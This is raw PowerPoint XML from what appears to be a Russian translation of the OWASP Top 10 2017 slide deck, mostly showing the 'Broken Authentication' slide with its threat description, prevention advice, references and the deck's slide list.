                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> могут помочь злоумышленникам найти подобные уязвимости.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Внедрения могут привести к потере данных, их повреждению или разглашению третьим лицам, а также к отказу в обслуживании. В некоторых случаях контроль над узлом может быть полностью перехвачен.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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Box 2"/>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4" name="TextBox 3"/>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
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>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2" name="TextBox 1"/>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5" name="TextBox 4"/>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6" name="TextBox 5"/>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4"/>
              </a:rPr>
              <a:t>Атака на учетные записи,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> с использованием </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>списков известных паролей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, является очень распространенной. Если в приложении нет защиты от автоматизированных атак или атак на учетные записи, то оно может быть использовано для определения действующих учетных данных.</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Большинство атак на аутентификацию связано с использованием исключительно паролей. Ранее считавшиеся хорошими требования к смене пароля и его сложности способствуют использованию и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>переиспользованию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> пользователями ненадежных паролей. Организациям рекомендуется отказаться от подобной практики (см. NIST 800-63) и внедрить многофакторную аутентификацию.</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Тайм-ауты сессий настроены некорректно. Люди используют общедоступные компьютеры для доступа к приложению, а вместо "выхода из приложения" просто закрывают вкладку и уходят. Злоумышленник может открыть тот же самый браузер, спустя час, и воспользоваться все еще действующей аутентификацией пользователя.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Подтверждение личности пользователя, аутентификация и управление сессиями играют важную роль в защите от атак, связанных с аутентификацией.</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Приложение имеет недостатки в аутентификации, если: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автоматизированных атак, например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>на учетные записи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, когда у атакующего есть список действующих имен и паролей пользователей;</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атак методом подбора или других автоматизированных атак;</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использование стандартных, ненадежных или хорошо известных паролей, например, "Password1" или "</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ненадежные или неэффективные методы восстановления учетных данных и паролей, например, "ответы на основе знаний", которые являются небезопасными;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незашифрованные, зашифрованные или ненадежно хешированные пароли (см. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" b="1" dirty="0">
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Разглашение конфиденциальных данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>отсутствует или является неэффективной многофакторная аутентификация;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>отображаются идентификаторы сессии в URL (например, перезапись URL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>не меняются идентификаторы сессий после успешного входа в систему;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>некорректно аннулируются идентификаторы сессий. Пользовательские сессии или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аутентификации (в частности,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единого входа (SSO)) неправильно аннулируются при выходе из системы или бездействии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7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800"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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> защита OWASP: реализация защиты идентификационных данных и аутентификации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(ASVS): V2 Аутентификация</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8"/>
              </a:rPr>
              <a:t>V3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9"/>
              </a:rPr>
              <a:t>Руководство OWASP по тестированию: Идентификационные данные</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10"/>
              </a:rPr>
              <a:t>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1"/>
              </a:rPr>
              <a:t>Памятка OWASP: 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2"/>
              </a:rPr>
              <a:t>Памятка OWASP: Утечка учётных данных</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3"/>
              </a:rPr>
              <a:t>Памятка OWASP: Забытый пароль</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Памятка OWASP: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Справочник OWASP по автоматизированным атакам</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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5"/>
              </a:rPr>
              <a:t>NIST 800-63b: 5.1.1 Запоминаемые секреты</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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6"/>
              </a:rPr>
              <a:t>CWE-287: Некорректная аутентификация</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7"/>
              </a:rPr>
              <a:t>CWE-384: Фиксация сессии</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Где это возможно, реализуйте многофакторную аутентификацию для предотвращения автоматизированных атак, атак на учетные записи и методом подбора, а также повторного использования украденных учетных данных. </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Не используйте создаваемые по умолчанию (стандартные) учетные данные, особенно для администраторов.</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Реализуйте проверку надежности паролей, например, проверяя вновь создаваемые или изменяемые пароли по списку </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>"10000 наихудших паролей"</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Установите длину, сложность и периодичность смены паролей в соответствии с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>руководством NIST 800-63 B (раздел 5.1.1 "Запоминаемые секреты")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> или любой другой современной парольной политикой.</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Обеспечьте защиту регистрации, восстановления учетных данных и API от атак методом перечисления, используя во всех ответах одинаковые сообщения.</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Ограничьте или значительно увеличьте интервал между неудачными попытками входа. Регистрируйте все неудачные попытки и уведомляйте администраторов при обнаружении атак на учетные данные, методом подбора или любых других атак.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-8280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Используйте серверные, надежные, встроенные менеджеры сессий, генерирующие после входа в систему новые, случайные идентификаторы с высокой степенью энтропии. Идентификаторы сессий не должны присутствовать в URL, а должны безопасно храниться и аннулироваться после выхода из системы, простоя или наступления абсолютного тайм-аута</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin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nchor="ctr">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" dirty="0" smtClean="0"/>
              <a:t>A2</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r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Недостатки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>аутентификации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1731906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Злоумышленники имеют доступ к сотням тысяч действительных комбинаций имен и паролей для атак на учетные записи, спискам стандартных учетных данных администраторов, инструментам для автоматизации атак методом подбора и атак по словарям. Атаки на сессии хорошо изучены, особенно в части действующих </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>токенов</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> сессий.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60" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Недостатки аутентификации очень распространены из-за исполнения и реализации большинства средств идентификации и контроля доступа. Управление сессиями является основой аутентификации и контроля доступа и присутствует во всех приложениях с контролем состояния.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Атакующие могут обнаружить недостатки аутентификации вручную и эксплуатировать их, используя автоматизированные инструменты, списки паролей и атаки по словарю.</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sz="680" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Для компрометации системы злоумышленнику достаточно получить доступ к нескольким обычным или одной администраторской учетной записи. В зависимости от области использования приложения результатом может стать отмывание денег, мошенничество в сфере социального обеспечения или кража персональных данных, а также разглашение охраняемой законом, конфиденциальной информации.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TextBox 9"/>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12" name="TextBox 11"/>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
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>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14" name="TextBox 13"/>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15" name="TextBox 14"/>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16" name="TextBox 15"/>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TotalTime>
  <Words>11783</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter Paper (8.5x11 in)</PresentationFormat>
  <Paragraphs>1296</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Содержание</vt:lpstr>
      <vt:lpstr>Предисловие</vt:lpstr>
      <vt:lpstr>Введение</vt:lpstr>
      <vt:lpstr>Что нового</vt:lpstr>
      <vt:lpstr>Угрозы безопасности приложений</vt:lpstr>
      <vt:lpstr>Топ-10 OWASP Угрозы безопасности приложений – 2017 </vt:lpstr>
      <vt:lpstr>Внедрение</vt:lpstr>
      <vt:lpstr>Недостатки аутентификации</vt:lpstr>
      <vt:lpstr>Разглашение конфиденциальных данных</vt:lpstr>
      <vt:lpstr>Внешние сущности XML (XXE)</vt:lpstr>
      <vt:lpstr>Недостатки контроля доступа</vt:lpstr>
      <vt:lpstr>Некорректная настройка параметров безопасности</vt:lpstr>
      <vt:lpstr>Межсайтовое выполнение сценариев (XSS)</vt:lpstr>
      <vt:lpstr>Небезопасная десериализация</vt:lpstr>
      <vt:lpstr>Использование компонентов с известными уязвимостями</vt:lpstr>
      <vt:lpstr>Недостатки журналирования и мониторинга</vt:lpstr>
      <vt:lpstr>Что делать разработчикам</vt:lpstr>
      <vt:lpstr>Что делать тестировщикам</vt:lpstr>
      <vt:lpstr>Что делать организациям</vt:lpstr>
      <vt:lpstr>Что делать менеджерам приложений</vt:lpstr>
      <vt:lpstr>Об угрозах</vt:lpstr>
      <vt:lpstr>О факторах риска</vt:lpstr>
      <vt:lpstr>Методология и данные</vt:lpstr>
      <vt:lpstr>Благодарности</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Evgeny Zudilin</cp:lastModifiedBy>
  <cp:revision>1934</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-14T13:34:10Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>